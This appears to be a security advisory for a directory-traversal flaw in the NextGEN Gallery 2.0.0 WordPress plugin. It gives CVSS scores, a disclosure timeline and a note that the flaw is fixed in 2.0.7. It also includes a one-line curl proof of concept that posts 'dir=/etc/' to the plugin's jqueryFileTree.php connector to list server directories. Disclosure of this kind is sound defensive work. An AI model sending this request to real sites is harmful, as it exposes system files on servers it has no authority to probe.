Directory traversal in NextGEN Gallery 2.0.0


Last revised:

An unauthenticated POST request to a particular URI with a particular parameter lists the contents of arbitrary directories.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 5 Medium
Vector Network
Complexity Low
Authentication None
Confidentiality Partial
Integrity None
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

curl -i -d 'dir=/etc/' http://localhost/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.php

Advisory timeline

2013-08-09: Reported to vendor
2013-08-09: Vendor reports fixed
2014-02-18: Published
2015-07-14: Re-requested CVE

Mitigation/further actions

This issue is reported to be fixed as of version 2.0.7. Prior versions should be updated immediately.